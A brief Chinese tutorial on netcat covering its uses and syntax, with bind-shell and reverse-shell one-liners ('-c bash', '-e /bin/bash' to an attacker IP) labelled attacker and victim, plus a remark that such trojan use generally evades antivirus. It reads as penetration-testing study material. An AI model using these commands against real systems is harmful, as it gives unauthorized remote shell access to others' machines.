Netcat的介绍和使用
作用:
- 侦听模式/传输模式
- telnet/获取 banner信息(当作telnet工具使用,甚至更好用)
- 传输文本信息(可以作为聊天工具)
- 传输文件/目录
- 加密传输文件
- 远程控制/木马(一般来说,不会被查杀)
- 加密所有流量
- 流媒体服务器
- 远程克隆硬盘(一般用作电子取证)
命令编写:
一般格式为
nc + 选项 + IP + 指定端口号
tips:一般来说命令是可以合写的
聊天
两个终端之间进行聊天(左为监听端,右为连接端)。
信息传递
把目标机的ls结果传给监听机。
传输文件或目录
端口扫描
控制
正向
客户端A 【控制端】 :nc -nv ip 7777
服务器端B【被控制端】:nc -lvp 7777 -c bash
上面的命令挺类似于使用nc聊天的命令,所不同的是服务器端加了一个-c bash,命令的意思是一旦有人来连接自己,就把自己的一个bash传给对方。
反向
客户端A 【被控制端】:nc –nv ip 7777 -c bash
服务器端B【控制端】 :nc -lvp 7777
nc反弹shell
攻击者:nc -lvp 4566
受害者:nc -e /bin/bash 192.168.239.128 4566
-e prog 程序重定向,一旦连接,就执行
注意之前使用nc监听端口反弹shell时都会有一个警告:192.168.239.130: inverse host lookup failed: Unknown host
根据nc帮助文档的提示加上-n参数就可以不产生这个警告了,-n参数代表在建立连接之前不对主机进行dns解析。